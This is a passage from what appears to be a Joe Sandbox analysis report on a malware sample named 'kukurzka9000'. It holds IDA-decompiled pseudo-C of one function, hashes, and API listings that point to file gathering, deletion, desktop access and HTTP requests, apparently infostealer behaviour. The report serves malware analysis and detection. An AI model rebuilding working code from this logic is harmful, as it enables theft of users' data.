													_t199 = _v28;
												} else {
													_t127 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, _t187, _t165, 0, 0);
													_t199 = _v28;
													if(_t127 != 0) {
														E00407EDB(_v44, _t187, 0, 0, _v24, _t199, _v32,  &_v56);
													}
												}
												LocalFree(_t187);
												LocalFree(_v32);
												LocalFree(_v36);
												LocalFree(_v48);
											}
										}
									}
									LocalFree(_v8);
									LocalFree(_v12);
									LocalFree(_v16);
									LocalFree(_v20);
									LocalFree(_t144);
									LocalFree(_t199);
									_t103 = _v40;
									L23:
									return _t103;
								}
								LocalFree(_v8);
								LocalFree(_v12);
								LocalFree(_v16);
								LocalFree(_v20);
								_push(0xfffffffa);
								L13:
								_pop(_t103);
								goto L23;
							}
							LocalFree(_v8);
							LocalFree(_v12);
							LocalFree(_v16);
							_push(0xfffffffb);
							goto L13;
						}
						LocalFree(_v8);
						LocalFree(_v12);
						_push(0xfffffffc);
						goto L13;
					}
					LocalFree(_v8);
					_push(0xfffffffd);
					goto L13;
				} else {
					_t146 = _t62 - _t178;
					_t142 = _t146 >> 1;
					if(_t146 >= 0) {
						goto L5;
					}
					_t140 = 0xfffffffe;
					return _t140;
				}
			}

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 920dc5c48ddd3d6d108e0df5f74ef4019b895daab8de7caf07ff3aedad1c931d
Instruction ID: 5fa1488eec15b5c1e265b2db03af03f3b622e2a9793851092692c2b0c9e4c5eb
Opcode Fuzzy Hash: 920dc5c48ddd3d6d108e0df5f74ef4019b895daab8de7caf07ff3aedad1c931d
Instruction Fuzzy Hash: 5DA1D371A00215AFDB009BEADE45EAE7BB5EF48310F104535F614F72E0DBB46D218B69

Uniqueness

Uniqueness Score: -1.00%

Function 00409BD9 Relevance: 30.3, APIs: 24, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00409BD9(void* __ecx, short* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				short* _v44;
				void* _v48;
				signed int _v52;
				char _v56;
				signed int _t60;
				void* _t62;
				void* _t71;
				void* _t78;
				void* _t85;
				void* _t94;
				signed int _t103;
				void* _t109;
				void* _t111;
				void* _t112;
				void* _t115;
				char _t116;
				void* _t117;
				void* _t127;
				void* _t140;
				signed int _t142;
				void* _t144;
				signed int _t146;
				void* _t165;
				void* _t173;
				signed int _t177;
				void* _t178;
				void* _t180;
				void* _t182;
				void* _t184;
				void* _t187;
				void* _t188;
				signed int _t193;
				signed int _t197;
				void* _t199;
				void* _t202;

				_v24 = _v24 & 0x00000000;
				_t142 = 0;
				_v44 = __edx;
				_v40 = _v40 & 0;
				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e2d8);
				_t177 = _t60;
				if(_t177 == 0) {
					return _t60 | 0xffffffff;
				}
				_t178 = _t177 + 0xc;
				_t62 =  *((intOrPtr*)( *0x40e18c))(_t178,  *0x40e1f0);
				if(_t62 == 0) {
					L5:
					_v8 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t178, _t188) + _t64);
					if(E0040A3E4(_t178,  &_v8, 0, _t142) != 0) {
						_t180 = _t178 + _t142 * 2 + 2;
						_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t180) + _t69);
						_v12 = _t71;
						_t193 =  *((intOrPtr*)( *0x40e18c))(_t180,  *0x40e20c) - _t180 >> 1;
						if(E0040A3E4(_t180,  &_v12, 0, _t193) != 0) {
							_t182 = _t180 + _t193 * 2 + 2;
							_t78 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t182) + _t76);
							_v16 = _t78;
							_t197 =  *((intOrPtr*)( *0x40e18c))(_t182,  *0x40e20c) - _t182 >> 1;
							if(E0040A3E4(_t182,  &_v16, 0, _t197) != 0) {
								_t184 = _t182 + _t197 * 2 + 2;
								_t85 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t184) + _t83);
								_push( *0x40e228);
								_v20 = _t85;
								_push(_t184);
								if(E0040A3E4(_t184,  &_v20, 0,  *((intOrPtr*)( *0x40e18c))() - _t184 >> 1) != 0) {
									_t199 =  *((intOrPtr*)( *0x40e044))(0x40, 0x4000);
									_v28 = _t199;
									_t94 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
									_push(0);
									_t144 = _t94;
									_push(0x1a);
									_push(_t144);
									_push(0);
									if( *((intOrPtr*)( *0x40e0c4))() != 0) {
										_push(_v12);
										_push(_t144);
										_push(_t144);
										if( *((intOrPtr*)( *0x40e000))() != 0) {
											_v40 = 1;
											E004052DA(_t144, _t144, _v8, _v16, _v20, _t199,  &_v24);
											if(_v24 > 0) {
												_t109 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
												_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
												_t173 = 0x10;
												_t112 = E0040A05F(_t109, _t173);
												_t202 = _t112;
												_v48 = _t202;
												_t115 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t111,  *0x40e210), _t202);
												_v52 = _v52 & 0x00000000;
												_v36 = _t115;
												_t116 =  *0x40e204; // 0x6e78d8
												_v56 = _t116;
												_t117 = E00408619( &_v36);
												_v32 = _t117;
												_t187 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
												_t165 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, 0, 0, 0, 0);
												if(_t165 == 0) {
													_t199 = _v28;
												} else {
													_t127 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, _t187, _t165, 0, 0);
													_t199 = _v28;
													if(_t127 != 0) {
														E00407EDB(_v44, _t187, 0, 0, _v24, _t199, _v32,  &_v56);
													}
												}
												LocalFree(_t187);
												LocalFree(_v32);
												LocalFree(_v36);
												LocalFree(_v48);
											}
										}
									}
									LocalFree(_v8);
									LocalFree(_v12);
									LocalFree(_v16);
									LocalFree(_v20);
									LocalFree(_t144);
									LocalFree(_t199);
									_t103 = _v40;
									L23:
									return _t103;
								}
								LocalFree(_v8);
								LocalFree(_v12);
								LocalFree(_v16);
								LocalFree(_v20);
								_push(0xfffffffa);
								L13:
								_pop(_t103);
								goto L23;
							}
							LocalFree(_v8);
							LocalFree(_v12);
							LocalFree(_v16);
							_push(0xfffffffb);
							goto L13;
						}
						LocalFree(_v8);
						LocalFree(_v12);
						_push(0xfffffffc);
						goto L13;
					}
					LocalFree(_v8);
					_push(0xfffffffd);
					goto L13;
				} else {
					_t146 = _t62 - _t178;
					_t142 = _t146 >> 1;
					if(_t146 >= 0) {
						goto L5;
					}
					_t140 = 0xfffffffe;
					return _t140;
				}
			}

0x00409be4
0x00409bf0
0x00409bf2
0x00409bf5
0x00409bf9
0x00409bfb
0x00409bff
0x00000000
0x00409c01
0x00409c14
0x00409c18
0x00409c1c
0x00409c2e
0x00409c4a
0x00409c58
0x00409c78
0x00409c83
0x00409c8b
0x00409c9f
0x00409cae
0x00409cd7
0x00409ce2
0x00409cea
0x00409cfe
0x00409d0b
0x00409d3a
0x00409d45
0x00409d47
0x00409d4d
0x00409d55
0x00409d6c
0x00409da8
0x00409db6
0x00409db9
0x00409dbb
0x00409dbd
0x00409dc4
0x00409dc6
0x00409dc7
0x00409dcd
0x00409dd3
0x00409ddb
0x00409ddc
0x00409de1
0x00409dea
0x00409e00
0x00409e0c
0x00409e1f
0x00409e2b
0x00409e2f
0x00409e34
0x00409e3f
0x00409e47
0x00409e50
0x00409e55
0x00409e5c
0x00409e5f
0x00409e64
0x00409e67
0x00409e71
0x00409e7f
0x00409e95
0x00409e99
0x00409ed6
0x00409e9b
0x00409eaf
0x00409eb1
0x00409eb6
0x00409ecc
0x00409ed1
0x00409eb6
0x00409eda
0x00409ee3
0x00409eec
0x00409ef5
0x00409ef5
0x00409e0c
0x00409de1
0x00409efe
0x00409f07
0x00409f10
0x00409f19
0x00409f20
0x00409f27
0x00409f2d
0x00409f30
0x00000000
0x00409f30
0x00409d71
0x00409d7a
0x00409d83
0x00409d8c
0x00409d92
0x00409d94
0x00409d94
0x00000000
0x00409d94
0x00409d10
0x00409d19
0x00409d22
0x00409d28
0x00000000
0x00409d28
0x00409cb3
0x00409cbc
0x00409cc2
0x00000000
0x00409cc2
0x00409c5d
0x00409c63
0x00000000
0x00409c1e
0x00409c20
0x00409c22
0x00409c24
0x00000000
0x00000000
0x00409c28
0x00000000
0x00409c28

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9d1e3923032fdb29136ca73d0ba7c8e72e19fc8f1c47f7929fd4c366d02da90
Instruction ID: 1477a699490ab6d120e37a0d83275f9d0d9eb78bf41bd20a7fb73821678a20ad
Opcode Fuzzy Hash: b9d1e3923032fdb29136ca73d0ba7c8e72e19fc8f1c47f7929fd4c366d02da90
Instruction Fuzzy Hash: FCA10572A00215BFEB00DBAADE45EAE7BB5EB48310F144935F614F32E1CB745D208B69

Uniqueness

Uniqueness Score: -1.00%

Function 022B222C Relevance: 30.2, APIs: 15, Strings: 2, Instructions: 440fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 022B22BB

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

StrCpyW.SHLWAPI(?,?), ref: 022B22FB
LocalFree.KERNEL32(00000000), ref: 022B2306
LocalFree.KERNEL32(00000000), ref: 022B2315
LocalFree.KERNEL32(00000000), ref: 022B2324
LocalFree.KERNEL32(00000000), ref: 022B2333
LocalFree.KERNEL32(00000000), ref: 022B233E
DeleteFileW.KERNEL32(?), ref: 022B24A4
LocalFree.KERNEL32(?), ref: 022B24AB
LocalFree.KERNEL32(00000000), ref: 022B24C3
LocalFree.KERNEL32(00000000), ref: 022B273F
LocalFree.KERNEL32(?), ref: 022B2748
LocalFree.KERNEL32(00000000), ref: 022B2756
LocalFree.KERNEL32(00000000), ref: 022B2760
DeleteFileW.KERNEL32(?), ref: 022B2797

Strings

FALSE, xrefs: 022B2659, 022B2705
TRUE, xrefs: 022B265E, 022B2669, 022B2700, 022B270D

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID: FALSE$TRUE
API String ID: 2194112602-1412513891
Opcode ID: d2b305aae021969603c5b297492c78034a2985e289075661334c01097b3b4819
Instruction ID: 17c1576ac354fb994ceeb942e0e2c23af4db2248850ecb7fc17c679364102ecc
Opcode Fuzzy Hash: d2b305aae021969603c5b297492c78034a2985e289075661334c01097b3b4819
Instruction Fuzzy Hash: E4025C71910219EFDB069FE2EE88AED7BB5FF08300F104924E911B72A0D7759960DF58

Uniqueness

Uniqueness Score: -1.00%

Function 022BA37A Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 300COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 022BA3C2
LocalFree.KERNEL32(00000000), ref: 022BA41D
LocalFree.KERNEL32(00000000), ref: 022BA424

Strings

`k, xrefs: 022BA564

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$FolderPathSpecial
String ID: `k
API String ID: 1941890384-2483355702
Opcode ID: 72788095e3ba856c56753af6b7a68af839d158276ac543cc7c9517f84d2339a1
Instruction ID: 888374713628e3e3d49f686ee3bd222826e3a1e39951a0b09e2f4af5596d61a4
Opcode Fuzzy Hash: 72788095e3ba856c56753af6b7a68af839d158276ac543cc7c9517f84d2339a1
Instruction Fuzzy Hash: 65A1C2B1A10215AFDB05DBE5DD89FEE7BB9EF48350F004428F615B7290DBB49910CB68

Uniqueness

Uniqueness Score: -1.00%

Function 022B2F4B Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 223fileCOMMON

Download Yara Rule

APIs

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

GetFileSize.KERNEL32(00000000,00000000), ref: 022B3042
LocalFree.KERNEL32(00000000), ref: 022B316F
LocalFree.KERNEL32(?), ref: 022B3178
LocalFree.KERNEL32(?), ref: 022B317F
LocalFree.KERNEL32(00000000), ref: 022B3186
FindClose.KERNEL32(00000002), ref: 022B31AD
LocalFree.KERNEL32(00000002), ref: 022B31B6
LocalFree.KERNEL32(?), ref: 022B31C6
LocalFree.KERNEL32(00000000), ref: 022B31CD
LocalFree.KERNEL32(?), ref: 022B31D4
LocalFree.KERNEL32(00000000), ref: 022B31DB
LocalFree.KERNEL32(?), ref: 022B31E4
LocalFree.KERNEL32(?), ref: 022B31ED
LocalFree.KERNEL32(00000000), ref: 022B31F4
DeleteFileW.KERNEL32(?), ref: 022B31FB

Part of subcall function 022B9C12: LocalFree.KERNEL32(00000000,?,?,022B1F22), ref: 022B9C75

Strings

`k, xrefs: 022B3066

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$File$CloseDeleteFindGlobalSize
String ID: `k
API String ID: 952173178-2483355702
Opcode ID: c0af09b8467f81c6f5b6c21aa0467688919da5cab6ecacf54911a18db2b2d236
Instruction ID: f1bd7c85141cb9d512ee1bdca525afca176f824c285fb7dd71f468cf7322d951
Opcode Fuzzy Hash: c0af09b8467f81c6f5b6c21aa0467688919da5cab6ecacf54911a18db2b2d236
Instruction Fuzzy Hash: CB71B471A10214AFDB05DBF2DD48EAE77B9EF89340F004928F615B72A0DB789950CF68

Uniqueness

Uniqueness Score: -1.00%

Function 022B9D4E Relevance: 25.3, APIs: 20, Instructions: 347COMMON

Download Yara Rule

APIs

Part of subcall function 022B9958: LocalFree.KERNEL32(00000000,?,022B32BA,00000002,?), ref: 022B99BD

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA0A0

Part of subcall function 022BA6EB: LocalFree.KERNEL32(00000000), ref: 022BA7D1
Part of subcall function 022BA6EB: LocalFree.KERNEL32(?), ref: 022BAA4D
Part of subcall function 022BA6EB: FindClose.KERNEL32(00000000), ref: 022BAA54

LocalFree.KERNEL32(?), ref: 022BA099

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

LocalFree.KERNEL32(00000000), ref: 022BA06F
LocalFree.KERNEL32(?), ref: 022BA078
LocalFree.KERNEL32(?), ref: 022BA081
LocalFree.KERNEL32(?), ref: 022BA08A
LocalFree.KERNEL32(022B7111,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA0A9
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA0B2
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA0BB
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA0C4
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA0CD
LocalFree.KERNEL32(022B7111,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA0F4
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA0FD
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA106
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA10F
LocalFree.KERNEL32(022B7111,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA11D
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA126
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA12F
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA138
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022B7111), ref: 022BA13F

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$CloseFindGlobal
String ID:
API String ID: 1000408776-0
Opcode ID: da41649cdfaa69d85f6674120de0b24903d668d69a5e938357de5707fbedf273
Instruction ID: 8166461d8fa534d4d56ac8d3309836251950f7c3c89c77cd1df3d21e7c5646ce
Opcode Fuzzy Hash: da41649cdfaa69d85f6674120de0b24903d668d69a5e938357de5707fbedf273
Instruction Fuzzy Hash: 07C18472910215AFDB099FE6DE49EEE7BB5EF48310F044829FA05B32A0DB745D50CB68

Uniqueness

Uniqueness Score: -1.00%

Function 022B914D Relevance: 25.3, APIs: 20, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cef58336c127519e834a542057a8c6bde7dd657260fd76d22c0132126a0d320
Instruction ID: b905dc336cd70ed8b30530bbbe44d8d34328af64bf2525c16dd2eb74e4456261
Opcode Fuzzy Hash: 0cef58336c127519e834a542057a8c6bde7dd657260fd76d22c0132126a0d320
Instruction Fuzzy Hash: D8A1D572A10215AFEB019BEADE45EEE7BB9EF48350F104524F614F71A0CBB05D508F69

Uniqueness

Uniqueness Score: -1.00%

Function 022B44F2 Relevance: 25.3, APIs: 20, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c78de96184f9a35f28283014b90c132c45570b675f53bf2a6977543753af1da
Instruction ID: 8a2f8ac5f523039afe2c3f3bc067c911aa72607420b9d2f357ed482a5b943b8d
Opcode Fuzzy Hash: 1c78de96184f9a35f28283014b90c132c45570b675f53bf2a6977543753af1da
Instruction Fuzzy Hash: 26A1C372A10215AFDB01ABEADE45EEE7BB9EF48310F144524F615F71A0CBB06D10CB69

Uniqueness

Uniqueness Score: -1.00%

Function 022B5C99 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 321COMMON

Download Yara Rule

APIs

Part of subcall function 022B9A77: GlobalFree.KERNEL32(022B1F22), ref: 022B9AC4

PathCombineW.SHLWAPI(00000000,00000000,0000002E), ref: 022B5D2D

Strings

., xrefs: 022B5D03

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: CombineFreeGlobalPath
String ID: .
API String ID: 1842026532-248832578
Opcode ID: e2b1b369697f91e98e90e0f59b02c0883434508b7dc7d4233a499d6016bd9fa5
Instruction ID: 1668f9ae27dc6e3b8813f8c38002b84490862c1ef631b063609d892076a36eba
Opcode Fuzzy Hash: e2b1b369697f91e98e90e0f59b02c0883434508b7dc7d4233a499d6016bd9fa5
Instruction Fuzzy Hash: 80C17FB1D00219AFDB05DFE5DD44AEEBBBAEF88300F104429EA15B72A0DB746951CF64

Uniqueness

Uniqueness Score: -1.00%

Function 022B3203 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

., xrefs: 022B33A1

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 8eb8ff996c082bd78e62886e718282b1ca5e0bd6b9d0ceec2433230310415ef2
Instruction ID: 17ca01bee49014dea376e58c5a180271d806f5e71bdd78c1f8b44d8662b1a21b
Opcode Fuzzy Hash: 8eb8ff996c082bd78e62886e718282b1ca5e0bd6b9d0ceec2433230310415ef2
Instruction Fuzzy Hash: 5591A371A10215AFDB09DFA5DD48EAE7BB5EF48340F004968F905B72A0DB746D50CF68

Uniqueness

Uniqueness Score: -1.00%

Function 022B7BC0 Relevance: 24.2, APIs: 14, Strings: 2, Instructions: 247COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,?,?,?,?,?,022B6F57), ref: 022B7D96
LocalFree.KERNEL32(?,?,?,?,?,?,?,022B6F57), ref: 022B7DA4
LocalFree.KERNEL32(00000000), ref: 022B7DBB
LocalFree.KERNEL32(00000000), ref: 022B7DC6
LocalFree.KERNEL32(00000000), ref: 022B7DD1
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,022B6F57), ref: 022B7E01
LocalFree.KERNEL32(?,?,?,?,?,?,?,022B6F57), ref: 022B7E17
LocalFree.KERNEL32(?,?,?,?,?,?,?,022B6F57), ref: 022B7E2F
LocalFree.KERNEL32(00000000), ref: 022B7E3E
LocalFree.KERNEL32(00000000), ref: 022B7E49
LocalFree.KERNEL32(00000000), ref: 022B7E54
LocalFree.KERNEL32(?,?,?,?,?,?,?,022B6F57), ref: 022B7E66
LocalFree.KERNEL32(00000000), ref: 022B7E75
LocalFree.KERNEL32(00000000), ref: 022B7E84

Strings

xzn, xrefs: 022B7D42
.dll, xrefs: 022B7D5B

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID: .dll$xzn
API String ID: 2826327444-3753594420
Opcode ID: 95061837a91f269392e0105e5022292588c8a9051f5e52f426446199278b41c2
Instruction ID: a2ec7f0a6232140f6706e4df41e0c53e878df594a1cfe5a975e1db0054f81eac
Opcode Fuzzy Hash: 95061837a91f269392e0105e5022292588c8a9051f5e52f426446199278b41c2
Instruction Fuzzy Hash: 2381D776A102169BDB06DFF5DD84ABEB7B9AF84380F044829E901F7294DB74ED40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00406AF4 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 187filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

LocalFree.KERNEL32(00000000), ref: 00406BA0
wsprintfW.USER32 ref: 00406C85
lstrlenW.KERNEL32 ref: 00406C92
LocalFree.KERNEL32(?), ref: 00406CAF
DeleteFileW.KERNEL32(?), ref: 00406CE9
LocalFree.KERNEL32(?), ref: 00406CF4
LocalFree.KERNEL32(00000000), ref: 00406CFF
LocalFree.KERNEL32(00000000), ref: 00406D0B
DeleteFileW.KERNEL32(?), ref: 00406D12
LocalFree.KERNEL32(?), ref: 00406D19

Strings

TRUE, xrefs: 00406C6A, 00406C75
FALSE, xrefs: 00406C65

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile$lstrlenwsprintf
String ID: FALSE$TRUE
API String ID: 4168217763-1412513891
Opcode ID: 05357ced764b7ba51e890c53d3fe89fe9df73bb22b38b0f22364097a277e5634
Instruction ID: c49cda921923e69c5166418a1bf50fcb18860fb3db535930a4ec2c5e5cba73ac
Opcode Fuzzy Hash: 05357ced764b7ba51e890c53d3fe89fe9df73bb22b38b0f22364097a277e5634
Instruction Fuzzy Hash: 25619571A00214AFDF049FA1EE44EAE7BB5EF48310F108439F916B72A1DB759D20DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00407C62 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 232networkCOMMON

Download Yara Rule

APIs

HttpSendRequestW.WININET(00000000,?,00000000), ref: 00407E0E
InternetCloseHandle.WININET(00000000), ref: 00407E39
InternetCloseHandle.WININET(?), ref: 00407E45
InternetCloseHandle.WININET(00000000), ref: 00407E4C
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 00407E6E
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 00407EA6
LocalFree.KERNEL32(0000002F), ref: 00407EBA
LocalFree.KERNEL32(?), ref: 00407EC3
LocalFree.KERNEL32(00000000), ref: 00407ECA

Strings

/, xrefs: 00407CD5
mozzzzzzzzzzz, xrefs: 00407D6A

Memory Dump Source

Source File: 00000017.00000002.366847792.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.367266584.0000000000410000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: CloseFreeHandleInternetLocal$ByteCharMultiWide$HttpRequestSend
String ID: /$mozzzzzzzzzzz
API String ID: 2620049550-9660103
Opcode ID: 6c2859dcb35dbed66665eb2f5d4fab0f439358c126c8472905a5f17b3495ad7a
Instruction ID: 677f3e060cdc4141eea8ad2591dda170fc442a0e6149e7f0a8c7285b1f3b2b30
Opcode Fuzzy Hash: 6c2859dcb35dbed66665eb2f5d4fab0f439358c126c8472905a5f17b3495ad7a
Instruction Fuzzy Hash: 0F71BF71A00215BFEB149BA5CD45F7B77B8EB48700F04847AFA14FB2D0D6B4AD508BA9

Uniqueness

Uniqueness Score: -1.00%

Function 022B484E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 022B48AD
LocalFree.KERNEL32(?), ref: 022B4AF4
LocalFree.KERNEL32(?), ref: 022B4B14
FindClose.KERNEL32(00000000), ref: 022B4B1B

Strings

., xrefs: 022B48C1

Memory Dump Source

Source File: 00000017.00000002.370146651.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$CloseFind
String ID: .
API String ID: 3269183270-248832578
Opcode ID: eeb62ecb9f106cfc2f54af98f71ca67650812a65c88e6959245ad390bece3727
Instruction ID: 886233b2d64030c3f325a4a9cff3fd2c844a03ef9ba33fa742b03f8f0b8ab95a
Opcode Fuzzy Hash: eeb62ecb9f106cfc2f54af98f71ca67650812a65c88e6959245ad390bece3727
Instruction Fuzzy Hash: EB81BFB1204301AFD705DFA5DD94E6B77E5EF88344F00492CFA55A72A0DBB4E910CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00408ADD Relevance: 18.4, APIs: 12, Instructions: 387fileCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00408B01
GetClientRect.USER32(?,?), ref: 00408C7F
LocalFree.KERNEL32(?), ref: 00408F66

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000), ref: 00408E46
CloseHandle.KERNEL32(?), ref: 00408E51
DeleteFileW.KERNEL32(?), ref: 00408E58
LocalFree.KERNEL32(?), ref: 00408E5F
LocalFree.KERNEL32(?), ref: 00408E69
LocalFree.KERNEL32(00000000), ref: 00408F41
LocalFree.KERNEL32(?), ref: 00408F4B
LocalFree.KERNEL32(?), ref: 00408F55
LocalFree.KERNEL32(?), ref: 00408F5C

